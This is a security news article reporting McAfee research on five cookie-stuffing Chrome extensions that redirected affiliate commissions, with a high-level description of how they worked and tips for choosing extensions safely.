The Chrome Web Store is a treasure trove of browser extensions and utilities for Google Chrome users. However, wherever digital footfalls increase, attackers follow. Hackers are increasingly targeting chrome extensions to commit affiliate fraud or steal sensitive credentials from browsers. Researchers found five cookie-stuffing chrome extensions in the Chrome Web Store.
What is a cookie-stuffing chrome extension?
Browser extensions offer miscellaneous utilities, such as allowing users to take screenshots of the entire website in one go, generate website coupons, watch Netflix shows together, etc. Browser extensions can also track users' browsing activities and personal preferences on the web. Cookie-stuffing chrome extensions are Google Chrome extensions that can modify the cookies on the site so that the extension creators receive affiliate payment for various items purchased.
How are attackers leveraging imposter chrome extensions?
A few months ago, McAfee Labs discovered malicious extensions that can redirect users to phishing sites. The team further focused their research on several other chrome extensions. They found five imposter cookie-stuffing chrome extensions that tracked the victim's browsing activities to exploit retail affiliate programs. These malicious chrome extensions are:
Netflix Party:800,000+ downloads
Full Page Screenshot Capture: Screenshotting: 200,000+ downloads
FlipShope: Price Tracker Extension: 80,000+ downloads
Netflix Party: 300,000+ downloads (different from the first)
AutoBuy Flash Sales: 20,000+ downloads
Together, these browser extensions recorded 1.4 million downloads. McAfee researchers Oliver Devane and Vallabh Chole mentioned, "The extensions offer various functions such as enabling users to watch Netflix shows together, website coupons, and taking screenshots of a website. The latter borrows several phrases from another popular extension called GoFullPage." Currently, the "Full Page Screenshot" and "FlipShope" extensions are available for installation and can pose threats to the users. Google has removed Netflix Party and other extensions from the Web Store.
How do these imposter chrome extension works?
Whenever a victim purchases anything from the targeted e-commerce sites, the extension authors get a percentage of the profit for that purchase. Researchers identified that the extensions have a manifest.json that sets the background page as bg.html. It loads a b0.js file that is accountable for transmitting the URL being visited and injecting malicious code into any e-commerce site. Researchers also noted that the code creates random IDs by selecting 8-arbitrary characters from a character set.
McAfee researchers added, "Every website visited is sent to servers owned by the extension creator. They do this so that they can insert code into e-commerce websites being visited. This action modifies the cookies on the site so that the extension authors receive affiliate payment for any items purchased." Apart from all these functionalities, these cookie-stuffing chrome extensions also have a mechanism that delays the malicious practice/motive by 15 days from the day of installation to help evade red flags.
How to protect your system from imposter extensions
Here are a few things you can do before installing an extension.
Do thorough research: Before using any extension, security professionals and experts recommend thorough research to check whether the extension can pose threats.
Use extensions only if required: Use browser extensions only if it is essential. There are lots of unexplored extensions that can steal sensitive credentials or secretly monitor your browsing behaviour.
Keep yourself up to date: Stay updated with the latest research/news reports, and make a checklist of all the blacklisted extensions available in the store.
Seek guidance: Do not install any extension from third-party or torrent websites. Seek expert guidance from Packetlabs to build defensive mechanisms.